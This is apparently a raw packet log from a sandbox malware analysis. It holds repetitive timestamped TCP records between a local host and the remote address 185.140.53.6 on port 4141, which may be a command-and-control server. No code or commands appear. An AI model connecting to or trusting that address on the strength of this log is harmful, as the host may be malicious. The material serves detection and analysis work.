Jan 24, 2022 02:25:47.561151028 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.561286926 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.561317921 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.561368942 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.561398029 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.561528921 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.561602116 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.561634064 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.561712027 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.561758995 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.561938047 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.561979055 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.562123060 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.562159061 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.562160969 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.562191010 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.562237024 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.562319040 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.562362909 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.562372923 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.562480927 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.562522888 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.562683105 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.562836885 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.566705942 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.566751003 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.566811085 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.566823959 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.566848993 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.566879988 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.566884041 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.566920996 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.567090988 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.567140102 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.567158937 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.567190886 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.567284107 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.567322016 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.567491055 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.567528009 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.567548990 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.567583084 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.567712069 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.567806959 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.567825079 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.567862034 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.567996979 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.568033934 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.568126917 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.568167925 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.568306923 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.568370104 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.570619106 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.570698023 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.575294018 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.575366974 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.575419903 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.575526953 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.575565100 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.575648069 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.575678110 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.575736046 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.575767040 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.575849056 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.575879097 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.575970888 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.575997114 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.576091051 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.576246977 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.576284885 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.576365948 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.576400042 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.589785099 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.591409922 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.592180014 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.592232943 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.596674919 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.606488943 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.606859922 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.606920958 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.607104063 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.607141972 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.630125999 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.631458998 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.647645950 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.647701025 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.647808075 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.647939920 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.648001909 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.649533987 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.649615049 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.649890900 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.649945974 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.650053978 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.650105000 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.659862995 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.659893990 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.659974098 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.660041094 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.660131931 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.660253048 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.660317898 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.660398006 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.663412094 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.663747072 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.663825989 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.663954020 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.664017916 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.664052963 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.664237022 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.664244890 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.664304018 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.675540924 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.675570965 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.675649881 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.675712109 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.675785065 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.675936937 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.676003933 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.686800003 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.686917067 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.686989069 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.687057972 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.687140942 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.687166929 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.687210083 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.687269926 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.687390089 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.687417984 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.687468052 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.687509060 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.687556982 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.687628031 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.687670946 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.687738895 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.687865973 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.687892914 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.687931061 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.687980890 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.688108921 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.688174963 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.688257933 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.688330889 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.690037012 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.690109968 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.690162897 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.690201044 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.690217972 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.690273046 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.690296888 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.690327883 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.690372944 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.690383911 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.690438986 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.690463066 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.690558910 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.699628115 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.699676037 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.699758053 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.699810028 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.699827909 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.699886084 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.699912071 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.699985027 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.699990988 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.700068951 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.700155973 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.700238943 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.701699972 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.701796055 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:51.704978943 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:51.810450077 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:51.815085888 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:51.826837063 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:52.036247015 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:52.036372900 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:52.339900970 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:52.340368986 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:52.432120085 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:52.464468956 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:52.788213015 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:52.789671898 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:52.993778944 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:52.993853092 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:52.993944883 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:52.994067907 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.117575884 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.117634058 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.117672920 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.117710114 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.117779970 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.117815018 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.128351927 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.219907999 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.219974995 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.220016003 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.220053911 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.220109940 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.223983049 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.233269930 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.233326912 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.233450890 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.251564980 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.251991987 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.269045115 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.269990921 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.310136080 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.310195923 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.310327053 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.310478926 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.310672998 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.312002897 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.315677881 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.362725019 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.362874985 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.362927914 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.362946987 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.362991095 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.363295078 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.363333941 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.363352060 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.363404036 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.363426924 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.363459110 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.363522053 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.363574028 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.363857985 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.363903999 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.363912106 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.363957882 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.364140034 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.364193916 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.364197016 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.364247084 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.378072023 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.383996010 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.398597956 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.398653984 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.398767948 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.428991079 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.429045916 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.429064035 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.429089069 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.429124117 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.429220915 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.429222107 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.429311991 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.429385900 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.429459095 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.429557085 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.429673910 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.465604067 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.465662003 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.465677023 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.465699911 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.465758085 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.465765953 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.467279911 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.467530012 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.469094992 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.469163895 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.469178915 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.469306946 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.469317913 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.469367981 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.469459057 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.469511986 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.469621897 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.469674110 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.469743013 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.469782114 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.469793081 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.469830990 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.469942093 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.470024109 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.470032930 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.470103025 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.470212936 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.470246077 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.470298052 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.470391035 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.470443964 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.470509052 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.470570087 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.482072115 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.482126951 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.482193947 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.482248068 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.482305050 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.482372046 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.482420921 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.482486010 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.482583046 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.482640028 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.482780933 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.482840061 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.526097059 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.526145935 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.526185036 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.526221991 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.526248932 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.526258945 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.526298046 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.526328087 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.526335001 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.526372910 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.526385069 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.526411057 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.526449919 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.526454926 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.526489973 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.526508093 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.526527882 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.526556969 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.526566029 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.526603937 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.526619911 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.526639938 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.526684046 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.526751041 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.527206898 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.527287960 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.527420044 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.527499914 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.527595997 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.527678967 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.575845003 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.575925112 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.575988054 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.576101065 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.576153040 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.576208115 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.576272011 CET	4141	49792	185.140.53.6	192.168.2.4
